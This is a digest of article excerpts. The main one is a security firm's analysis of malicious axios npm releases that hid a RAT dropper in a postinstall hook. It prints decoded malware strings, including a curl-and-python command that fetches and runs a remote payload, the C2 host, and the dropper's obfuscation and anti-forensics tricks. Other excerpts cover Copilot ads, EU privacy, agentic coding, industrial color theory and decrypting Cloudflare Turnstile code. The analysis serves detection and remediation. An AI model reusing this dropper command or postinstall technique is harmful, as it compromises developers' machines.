10 interesting stories served every morning and every evening.




1 1,712 shares, 96 trendiness

Malicious Versions Drop Remote Access Trojan

Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross-platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity is hosting a community town hall on this incident on April 1st at 10:00 AM PT - Register Here.

axios is the most popular JavaScript HTTP client library, with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of the library published to npm: axios@1.14.1 and axios@0.30.4. Both poisoned releases inject a new dependency, plain-crypto-js@4.2.1, a package never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross-platform remote access trojan (RAT) dropper targeting macOS, Windows, and Linux. The dropper contacts a live command-and-control (C2) server, delivers platform-specific second-stage payloads, then deletes itself and replaces its own package.json with a clean decoy to evade forensic detection.

If you have installed axios@1.14.1 or axios@0.30.4, assume your system is compromised.

There are zero lines of malicious code inside axios itself, and that is exactly what makes this attack so dangerous: the entire weapon lives in the injected dependency.
A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.

This was not opportunistic. It was precision. The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker's server, before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.

These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.

StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker's C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community-tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events
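The detection logic described here, flagging a destination because no prior run of the same workflow ever contacted it, can be illustrated with a minimal sketch. The function and data below are hypothetical, not Harden-Runner's actual API; they only show the first-seen baseline idea.

```python
# Hypothetical sketch of first-seen egress detection. The destinations and
# function name are illustrative, not Harden-Runner's real implementation.
def first_seen_destinations(current_run, prior_runs):
    """Return outbound destinations never observed in any prior run."""
    baseline = set().union(*prior_runs) if prior_runs else set()
    return sorted(set(current_run) - baseline)

# Baseline built from earlier workflow runs of the same job:
prior = [
    {"registry.npmjs.org:443", "github.com:443"},
    {"registry.npmjs.org:443"},
]
current = {"registry.npmjs.org:443", "sfrclak.com:8000"}
print(first_seen_destinations(current, prior))  # ['sfrclak.com:8000']
```

A destination like sfrclak.com:8000 stands out precisely because CI network behavior is otherwise highly repetitive, which is what makes a first-seen baseline effective.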

[Community Webinar] axios Compromised on npm: What We Know, What You Should Do

Join StepSecurity on April 1st at 10:00 AM PT for a live community briefing on the axios supply chain attack. We'll walk through the full attack chain, indicators of compromise, and remediation steps, and open it up for Q&A.

Register for the webinar →

The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid "brand-new package" alarms from security scanners:

plain-crypto-js@4.2.0, published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, with no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear to come from a zero-history account during later inspection.

plain-crypto-js@4.2.1, published by nrwise@proton.me — malicious payload added. The "postinstall": "node setup.js" hook and the obfuscated dropper are introduced.

axios@1.14.1, published by the compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.

axios@0.30.4, published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.

npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. The timestamp is inferred from the axios registry document's modified field (03:15:30Z); npm does not expose a dedicated per-version unpublish timestamp in its public API.

npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.

npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
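Given the timeline above, two quick triage signals follow directly from how the attack works: plain-crypto-js appearing in any lockfile is a red flag (no legitimate axios release has ever depended on it), and the dropper only executes at all because of an install-time lifecycle hook. The sketch below is illustrative triage, not StepSecurity tooling; the sample lockfile and manifest strings are made up for the demonstration.

```python
import json

def mentions_phantom_dep(lockfile_text, name="plain-crypto-js"):
    """True if the suspicious package name appears anywhere in a lockfile."""
    return name in lockfile_text

def find_install_hooks(manifest_text):
    """Return the lifecycle scripts that npm runs automatically on install."""
    hooks = ("preinstall", "install", "postinstall")
    scripts = json.loads(manifest_text).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in hooks}

# Sample inputs, shaped like (but not copied from) real lockfile/manifest data:
lock = '{"node_modules/plain-crypto-js": {"version": "4.2.1"}}'
manifest = '{"name": "plain-crypto-js", "scripts": {"test": "grunt", "postinstall": "node setup.js"}}'

print(mentions_phantom_dep(lock))    # True
print(find_install_hooks(manifest))  # {'postinstall': 'node setup.js'}
```

Neither check proves compromise on its own, but together they catch exactly the two mechanisms this incident relied on: a phantom dependency and an automatic install hook.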

The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account's registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches, maximizing the number of projects exposed.

Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project's normal GitHub Actions CI/CD pipeline.

A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm's OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token, with no OIDC binding and no gitHead:

    // axios@1.14.0 — LEGITIMATE
    "_npmUser": {
      "name": "GitHub Actions",
      "email": "npm-oidc-no-reply@github.com",
      "trustedPublisher": {
        "id": "github",
        "oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"
      }
    }

    // axios@1.14.1 — MALICIOUS
    "_npmUser": {
      "name": "jasonsaayman",
      "email": "ifstap@proton.me"
      // no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
    }

There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.

Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from account nrwise@proton.me. This package:

- Masquerades as crypto-js, with an identical description and a repository URL pointing to the legitimate brix/crypto-js GitHub repository
- Contains "postinstall": "node setup.js" — the hook that fires the RAT dropper on install
- Pre-stages a clean package.json stub in a file named package.md for evidence destruction after execution

The decoy version (4.2.0) was published 18 hours earlier to establish publishing history - a clean package in the registry that makes nrwise look like a legitimate maintainer.

What changed between 4.2.0 (decoy) and 4.2.1 (malicious)

A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions:

The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.

The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:

    // Contents of package.md (the clean replacement stub)
    {
      "name": "plain-crypto-js",
      "version": "4.2.0",  // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
      "description": "JavaScript library of crypto standards.",
      "license": "MIT",
      "author": { "name": "Evan Vosberg", "url": "http://github.com/evanvosberg" },
      "homepage": "http://github.com/brix/crypto-js",
      "repository": { "type": "git", "url": "http://github.com/brix/crypto-js.git" },
      "main": "index.js",
      // No "scripts" key — no postinstall, no test
      "dependencies": {}
    }

This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.

    # What npm list reports POST-infection (after the package.json swap):
    $ npm list plain-crypto-js
    myproject@1.0.0
    └── plain-crypto-js@4.2.0    # ← reports 4.2.0, not 4.2.1,
                                 #   but the dropper already ran as 4.2.1

    # The reliable check is the DIRECTORY PRESENCE, not the version number:
    $ ls node_modules/plain-crypto-js
    aes.js  cipher-core.js  core.js  ...

    # If this directory exists at all, the dropper ran.
    # plain-crypto-js is not a dependency of ANY legitimate axios version.

The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:

    // crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)

    {
      "name": "crypto-js",
      "version": "4.2.0",
      "description": "JavaScript library of crypto standards.",
      "author": "Evan Vosberg",
      "homepage": "http://github.com/brix/crypto-js",
      "scripts": {
        "test": "grunt"                    // ← no postinstall
      }
    }

    // plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
    {
      "name": "plain-crypto-js",           // ← different name, everything else cloned
      "version": "4.2.1",                  // ← version one ahead of the real package
      "description": "JavaScript library of crypto standards.",
      "author": { "name": "Evan Vosberg" },      // ← fraudulent use of real author name
      "homepage": "http://github.com/brix/crypto-js",  // ← real repo, wrong package
      "scripts": {
        "test": "grunt",
        "postinstall": "node setup.js"     // ← THE ONLY DIFFERENCE. The entire weapon.
      }
    }

The attacker published axios@1.14.1 and axios@0.30.4 with "plain-crypto-js": "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.

When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js's postinstall script, launching the dropper.

Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()'d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.

The Surgical Precision of the Injection

A complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.

    # File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)

    DIFFERS: package.json
    Total differing files: 1
    Files only in 1.14.1: (none)
    Files only in 1.14.0: (none)

    # --- axios/package.json (1.14.0)
    # +++ axios/package.json (1.14.1)
    -   "version": "1.14.0",
    +   "version": "1.14.1",
        "scripts": {
          "fix": "eslint --fix lib/**/*.js",
    -     "prepare": "husky"
        "dependencies": {
          "follow-redirects": "^2.1.0",
          "form-data": "^4.0.1",
          "proxy-from-env": "^2.1.0",
    +     "plain-crypto-js": "^4.2.1"
        }

Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the "prepare": "husky" script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project's standard release tooling, which would have re-added the husky prepare script.

The same analysis applies to axios@0.30.3 → axios@0.30.4:

    # --- axios/package.json (0.30.3)

    # +++ axios/package.json (0.30.4)
    -   "version": "0.30.3",
    +   "version": "0.30.4",
        "dependencies": {
          "follow-redirects": "^1.15.4",
          "form-data": "^4.0.4",
          "proxy-from-env": "^1.1.0",
    +     "plain-crypto-js": "^4.2.1"
        }

Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.

setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers.

All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:

_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript's Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:

    charCode XOR key[(7 × r × r) % 10] XOR 333

_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.

The dropper's entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033

StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:

    stq[0]  → "child_process"   // shell execution

    stq[1]  → "os"              // platform detection
    stq[2]  → "fs"              // filesystem operations
    stq[3]  → "http://sfrclak.com:8000/"   // C2 base URL
    stq[5]  → "win32"           // Windows platform identifier
    stq[6]  → "darwin"          // macOS platform identifier
    stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
    stq[13] → "package.json"    // deleted after execution
    stq[14] → "package.md"      // clean stub renamed to package.json
    stq[15] → ".exe"
    stq[16] → ".ps1"
    stq[17] → ".vbs"

This is the complete attack path from npm install to C2 contact and cleanup, across all three target platforms.

With all strings decoded, the dropper's full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.

    // setup.js — de-obfuscated and annotated
    // SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

...

Read the original on www.stepsecurity.io »

2 1,482 shares, 58 trendiness

copilot edited an ad into my pr

After a team member summoned Copilot to correct a typo in a PR of mine, Copilot edited my PR description to include an ad for itself and Raycast.

This is horrific. I knew this kind of bullshit would happen eventually, but I didn't expect it so soon.

Here is how platforms die: first, they are good to their users; then they abuse their users to make things better for their business customers; finally, they abuse those business customers to claw back all the value for themselves. Then, they die.

...

Read the original on notes.zachmanson.com »

3 1,402 shares, 49 trendiness

Protect Digital Privacy in the EU


🚨 The Conservatives (EPP) are attempting to force a new vote on Thursday (26th), seeking to reverse Parliament's NO on indiscriminate scanning. This is a direct attack on democracy and blatant disregard for your right to privacy. No means no. Take action now!

...

Read the original on fightchatcontrol.eu »

4 1,279 shares, 49 trendiness

Cancer

I've taken agency in the treatment of my bone cancer (osteosarcoma in the T5 vertebra of the upper spine). After I ran out of standard-of-care treatment options and there were no trials available for me, I started doing maximum diagnostics, created new treatments, began doing treatments in parallel, and am scaling this for others.

Elliot Hershberg wrote a great and extensive article about my cancer journey.

My cancer journey deck is embedded below; there is also a recording of an OpenAI Forum presentation. The companies we are building to scale this approach for others can be found at evenone.ventures. Please scroll further on this page for my data and other information.

I think the medical industry can be more patient-first; see this great article by Ruxandra: https://www.writingruxandrabio.com/p/the-bureaucracy-blocking-the-chance

For my data, please see https://osteosarc.com/, which includes my treatment timeline and a data overview doc with 25TB of publicly readable Google Cloud buckets.

Please subscribe to my mailing list.

...

Read the original on sytse.com »

5 1,015 shares, 41 trendiness

Thoughts on slowing the fuck down

It's been about a year since coding agents appeared on the scene that could actually build you full projects. There were precursors like Aider and early Cursor, but they were more assistant than agent. The new generation is enticing, and a lot of us have spent a lot of free time building all the projects we always wanted to build but never had time to.

And I think that's fine. Spending your free time building things is super enjoyable, and most of the time you don't really have to care about code quality and maintainability. It also gives you a way to learn a new tech stack if you so want.

During the Christmas break, both Anthropic and OpenAI handed out some freebies to hook people on their addictive slot machines. For many, it was the first time they experienced the magic of agentic coding. The fold's getting bigger.

Coding agents are now also being introduced to production codebases. After 12 months, we are now beginning to see the effects of all that "progress". Here's my current view.

While all of this is anecdotal, it sure feels like software has become a brittle mess, with 98% uptime becoming the norm instead of the exception, including for big services. And user interfaces have the weirdest fucking bugs that you'd think a QA team would catch. I grant you that that's been the case for longer than agents have existed. But we seem to be accelerating.

We don't have access to the internals of companies. But every now and then something slips through to some news reporter. Like this supposed AI-caused outage at AWS. Which AWS immediately "corrected". Only to then follow up internally with a 90-day reset.

Satya Nadella, the CEO of Microsoft, has been going on about how much code is now being written by AI at Microsoft. While we don't have direct evidence, there sure is a feeling that Windows is going down the shitter. Microsoft itself seems to agree, based on this fine blog post.

Companies claiming 100% of their product's code is now written by AI consistently put out the worst garbage you can imagine. Not pointing fingers, but memory leaks in the gigabytes, UI glitches, broken-ass features, crashes: that is not the seal of quality they think it is. And it's definitely not good advertising for the fever dream of having your agents do all the work for you.

Through the grapevine you hear more and more people, from software companies small and large, saying they have agentically coded themselves into a corner. No code review, design decisions delegated to the agent, a gazillion features nobody asked for. That'll do it.

We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned.

You're building an orchestration layer to command an army of autonomous agents. You installed Beads, completely oblivious to the fact that it's basically uninstallable malware. The internet told you to. That's how you should work or you're ngmi. You're ralphing the loop. Look, Anthropic built a C compiler with an agent swarm. It's kind of broken, but surely the next generation of LLMs can fix it. Oh my god, Cursor built a browser with a battalion of agents. Yes, of course, it's not really working and it needed a human to spin the wheel a little bit every now and then. But surely the next generation of LLMs will fix it. Pinky promise! Distribute, divide and conquer, autonomy, dark factories, software is solved in the next 6 months. SaaS is dead, my grandma just had her Claw build her own Shopify!

Now again, this can work for your side project barely anyone is using, including yourself. And hey, maybe there's somebody out there who can actually make this work for a software product that's not a steaming pile of garbage and is used by actual humans in anger.

If that's you, more power to you. But at least among my circle of peers I have yet to find evidence that this kind of shit works. Maybe we all have skill issues.

The problem with agents is that they make errors. Which is fine, humans also make errors. Maybe they are just correctness errors. Easy to identify and fix. Add a regression test on top for bonus points. Or maybe it's a code smell your linter doesn't catch. A useless method here, a type that doesn't make sense, duplicated code over there. On their own, these are harmless. A human will also make such booboos.

But clankers aren't humans. A human makes the same error a few times. Eventually they learn not to make it again. Either because someone starts screaming at them or because they're on a genuine learning path.

An agent has no such learning ability. At least not out of the box. It will continue making the same errors over and over again. Depending on the training data it might also come up with glorious new interpolations of different errors.

Now you can try to teach your agent. Tell it not to make that booboo again in your AGENTS.md. Concoct the most complex memory system and have it look up previous errors and best practices. And that can be effective for a specific category of errors. But it also requires you to actually observe the agent making that error.

There's a much more important difference between clanker and human. A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. The booboos will compound at a very slow rate. Usually, if the booboo pain gets too big, the human, who hates pain, will spend some time fixing up the booboos. Or the human gets fired and someone else fixes up the booboos. So the pain goes away.

With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny little harmless booboos suddenly compound at a rate that's unsustainable. You have removed yourself from the loop, so you don't even know that all the innocent booboos have formed a monster of a codebase. You only feel the pain when it's too late.

Then one day you turn around and want to add a new feature. But the architecture, which is largely booboos at this point, doesn't allow your army of agents to make the change in a functioning way. Or your users are screaming at you because something in the latest release broke and deleted some user data.

You realize you can no longer trust the codebase. Worse, you realize that the gazillions of unit, snapshot, and e2e tests you had your clankers write are equally untrustworthy. The only thing that's still a reliable measure of "does this work" is manually testing the product. Congrats, you fucked yourself (and your company).

You have zero fucking idea what's going on because you delegated all your agency to your agents. You let them run free, and they are merchants of complexity. They have seen many bad architectural decisions in their training data and throughout their RL training. You have told them to architect your application. Guess what the result is?

An immense amount of complexity, an amalgam of terrible cargo-cult "industry best practices", that you didn't rein in before it was too late. But it's worse than that.

Your agents never see each other's runs, never get to see all of your codebase, never get to see all the decisions that were made by you or other agents before they make a change. As such, an agent's decisions are always local, which leads to the exact booboos described above. Immense amounts of code duplication, abstractions for abstractions' sake.

All of this compounds into an unrecoverable mess of complexity. The exact same mess you find in human-made enterprise codebases. Those arrive at that state because the pain is distributed over a massive amount of people. The individual suffering doesn't pass the threshold of "I need to fix this". The individual might not even have the means to fix things. And organizations have super high pain tolerance. But human-made enterprise codebases take years to get there. The organization slowly evolves along with the complexity in a demented kind of synergy and learns how to deal with it.

With agents and a team of 2 humans, you can get to that complexity within weeks.

So now you hope your agents can fix the mess, refactor it, make it pristine. But your agents can also no longer deal with it. Because the codebase and complexity are too big, and they only ever have a local view of the mess.

And I'm not just talking about context window size or long-context attention mechanisms failing at the sight of a 1-million-lines-of-code monster. Those are obvious technical limitations. It's more devious than that.

Before your agent can try and help fix the mess, it needs to find all the code that needs changing and all existing code it can reuse. We call that agentic search. How the agent does that depends on the tools it has. You can give it a Bash tool so it can ripgrep its way through the codebase. You can give it some queryable codebase index, an LSP server, a vector database. In the end it doesn't matter much. The bigger the codebase, the lower the recall. Low recall means that your agent will, in fact, not find all the code it needs to do a good job.

This is also why those code smell booboos happen in the first place. The agent misses existing code, duplicates things, introduces inconsistencies. And then they blossom into a beautiful shit flower of complexity.

How do we avoid all of this?

Coding agents are sirens, luring you in with their speed of code generation and jagged intelligence, often completing a simple task with high quality at breakneck velocity. Things start falling apart when you think: "Oh golly, this thing is great. Computer, do my work!"

There's nothing wrong with delegating tasks to agents, obviously. Good agent tasks share a few properties: they can be scoped so the agent doesn't need to understand the full system. The loop can be closed, that is, the agent has a way to evaluate its own work. The output isn't mission critical, just some ad hoc tool or internal piece of software nobody's life or revenue depends on. Or you just need a rubber duck to bounce ideas against, which basically means bouncing your idea against the compressed wisdom of the internet and synthetic training data. If any of that applies, you've found the perfect task for the agent, provided that you as the human are the final quality gate.

Karpathy's auto-research applied to speeding up the startup time of your app? Great! As long as you understand that the code it spits out is not production-ready at all. Auto-research works because you give it an evaluation function that lets the agent measure its work against some metric, like startup time or loss. But that evaluation function only captures a very narrow metric. The agent will happily ignore any metrics not captured by the evaluation function, such as code quality, complexity, or even correctness, if your evaluation function is foobar.

The point is: let the agent do the boring stuff, the stuff that won't teach you anything new, or try out different things you'd otherwise not have time for. Then you evaluate what it came up with, take the ideas that are actually reasonable and correct, and finalize the implementation. Yes, sure, you can also use an agent for that final step.

And I would like to suggest that slowing the fuck down is the way to go. Give yourself time to think about what you're actually building and why. Give yourself an opportunity to say, fuck no, we don't need this. Set yourself limits on how much code you let the clanker generate per day, in line with your ability to actually review the code.

Anything that defines the gestalt of your system, that is architecture, API, and so on, write it by hand. Maybe use tab completion for some nostalgic feels. Or do some pair programming with your agent. Be in the code. Because the simple act of having to write the thing or seeing it being built up step by step introduces friction that allows you to better understand what you want to build and how the system “feels”. This is where your experience and taste come in, something the current SOTA models simply cannot yet replace. And slowing the fuck down and suffering some friction is what allows you to learn and grow.

The end result will be systems and codebases that continue to be maintainable, at least as maintainable as our old systems before agents. Yes, those were not perfect either. Your users will thank you, as your product now sparks joy instead of slop. You’ll build fewer features, but the right ones. Learning to say no is a feature in itself.

You can sleep well knowing that you still have an idea what the fuck is going on, and that you have agency. Your understanding allows you to fix the recall problem of agentic search, leading to better clanker outputs that need less massaging. And if shit hits the fan, you are able to go in and fix it. Or if your initial design has been suboptimal, you understand why it’s suboptimal, and how to refactor it into something better. With or without an agent, don’t fucking care.

All of this requires discipline and agency.

All of this requires humans.

...

Read the original on mariozechner.at »

6 964 shares, 39 trendiness

Why So Many Control Rooms Were Seafoam Green

Hello! This is a long, hopefully fun one! If you’re reading this in your email, you may need to click “expand” to read all the way to the end of this post. Thank you!

When I lived in Nashville, my girlfriends and I would take ourselves on “field trips” across the state. We once went on a tour to spot bald eagles in West Tennessee, and upon arrival, a woman with fluffy hair in the state park bathroom told us she had seen 113 bald eagles the day before. We ended up seeing (counts on one hand)…2.

In the summer of 2017, we went on another field trip to the National Park’s Manhattan Project Site in Oak Ridge, TN. In 1942, Oak Ridge, TN, was chosen as the site for a plutonium and uranium enrichment plant as part of the Manhattan Project, a top-secret WWII effort to develop the first atomic bomb. Once a small and rural farming community settled in the valley of East Tennessee, the swift task to create a nuclear bomb grew the secret settlement titled “Site X” from 3,000 people in 1942 to 75,000 by 1945. Alongside the population growth, enormously complex buildings were built.

A Note: The Manhattan Project created the nuclear bomb that caused extreme devastation in Japan and ended the war. There’s a lot of U.S. history that’s awful and indefensible. Today, though, I’d like to talk about the industrial design and color theory from that era.

Our first stop on the tour was the X-10 Graphite Reactor room and its control panel room. The X-10 Graphite Reactor, a 24-foot-square block of graphite, was the world’s second full-scale nuclear reactor. The plutonium produced from uranium there was shipped to Los Alamos, New Mexico, for research into the atomic bomb Fat Man.

What caught my eye as a designer, as with most industrial plants and control rooms of that time, besides the knobs, levers, and buttons, was the use of a very specific seafoam green, seen here on the reactor’s walls and in the control panel room.

Thus began my day-long search, traipsing through the internet for historical information about this specific shade of seafoam green.

Thankfully, this path led me to the work of color theorist Faber Birren.

In the fall of 1919, Faber Birren entered the Art Institute at the University of Chicago, only to drop out in the spring of 1921 to commit himself to self-education in color, as such a program didn’t exist. He spent his days interviewing psychologists and physicists and conducted his own color studies, which were considered unconventional at the time. He painted his bedroom walls red vermillion to test if it would make him go mad.

In 1933, he moved to New York City and became a self-appointed color consultant, approaching major corporations to sell the idea that appropriate use of color could boost sales. He convinced a Chicago wholesale meat company that the company’s white walls made the meat unappealing. He studied the steaks on various colored backgrounds and determined that a blue/green background would make the beef appear redder. Sales went up, and soon a number of industries hired Faber to bring color theory into their work, including DuPont, the leading chemical and wartime contract company, and the designer of the Manhattan Project buildings.

With the increase in wartime production in the US during WWII, Birren and DuPont created a master color safety code for the industrial plant industry, with the aim of reducing accidents and increasing efficiency within plants. These color codes were approved by the National Safety Council in 1944 and are now internationally recognized, having been mandatory practice since 1948. The color coding went as such:

* Fire Red: All fire protection, emergency stop buttons, and flammable liquids should be red

* Solar Yellow: Signifies caution and physical hazards such as falling

* Safety Green: Indicates safety features such as first-aid equipment, emergency exits, and eyewash stations

* Light Green: Used on walls to reduce visual fatigue

My “industrial seafoam” light green mystery has finally been solved thanks to this article from UChicago Magazine.

Keeping in theme with “control rooms”, I researched the second Manhattan Project plant, the Hanford Site, home to the B Reactor, the first full-scale plutonium production reactor in the world. To my surprise, this site looked like an ode to Birren’s light green and color codes, which makes sense, since his client, DuPont, was also responsible for the design and construction of Hanford.

In Birren’s 1963 book Color for Interiors: Historical and Modern, he writes about research undertaken to measure eye fatigue in the industrial workplace and the effects of interior color on human efficiency and well-being. Using the color chart above, he states that the proper use of color hues can reduce accidents, raise standards of machine maintenance, and improve labor morale.

“The importance of color in factories is first to control brightness in the general field of view for an efficient seeing condition. Interiors can then be conditioned for emotional pleasure and interest, using warm, cool, or luminous hues as working conditions suggest. Color should be functional and not merely decorative.” - Faber Birren

Now, looking at the interiors of the Manhattan Project control rooms and plants, the broad use of Light and Medium Green makes sense. One mistake and mass devastation could have occurred within these towns. Birren writes, “Note that most of the standards are soft in tone. This is deliberate and intended to establish a non-distracting environment. Green is a restful and natural-looking color for average factory interiors. Light Green with Medium Green is suggested.”

Let’s put these theories to work with this photo of the B-Reactor room found at the Hanford Site of the Manhattan Project. In Birren’s book, he directed the following color applications for small industrial areas:

* ✔️ Medium Gray is proposed for machinery, equipment, and racks

* ✔️ Beige walls may be applied to interiors deprived of natural light

As we can see, his color theory was followed to a T.

Other US Industrial Plants that Used these Color Methods

This color theory research just opened a whole can of design worms for me, and I’m excited to dive into them more. For example, Germany developed its own seafoam green, specifically designed for bridges, called Cologne Bridge Green. That’s a post for another day.

And finally, if you enjoy this sort of design, I designed a font called “Parts List” that is meant to evoke the feeling of sitting in an oil change waiting room, with the smell of burnt coffee. I created this font out of old auto parts lists, and it’s a perfectly wobbly typeface that will give you that ‘Is it a typewriter or handwriting?’ feeling. It’s now available on my website.

PS: I have an old friend whose dad still works at the Uranium plant in Oak Ridge. I told him that I was surprised that almost all of the facilities had been torn down, and he just looked at me straight in the face and said, “Who said it’s actually gone?” Noted. ✌️

Thanks for being here!

...

Read the original on bethmathews.substack.com »

7 927 shares, 37 trendiness

ChatGPT Won't Let You Type Until Cloudflare Reads Your React State. I Decrypted the Program That Does It.

Every ChatGPT message triggers a Cloudflare Turnstile program that runs silently in your browser. I decrypted 377 of these programs from network traffic and found something that goes beyond standard browser fingerprinting.

The program checks 55 properties spanning three layers: your browser (GPU, screen, fonts), the Cloudflare network (your city, your IP, your region from edge headers), and the ChatGPT React application itself (__reactRouterContext, loaderData, clientBootstrap). Turnstile doesn’t just verify that you’re running a real browser. It verifies that you’re running a real browser that has fully booted a specific React application.

A bot that spoofs browser fingerprints but doesn’t render the actual ChatGPT SPA will fail.

The Turnstile bytecode arrives encrypted. The server sends a field called turnstile.dx in the prepare response: 28,000 characters of base64 that change on every request.

The outer layer is XOR’d with the p token from the prepare request. Both travel in the same HTTP exchange, so decrypting it is straightforward:

import base64, json

raw = base64.b64decode(dx)
outer = json.loads(bytes(
    raw[i] ^ p_token[i % len(p_token)]  # p_token as bytes
    for i in range(len(raw))
))
# → 89 VM instructions

Inside those 89 instructions, there is a 19KB encrypted blob containing the actual fingerprinting program. This inner blob uses a different XOR key that is not the p token.

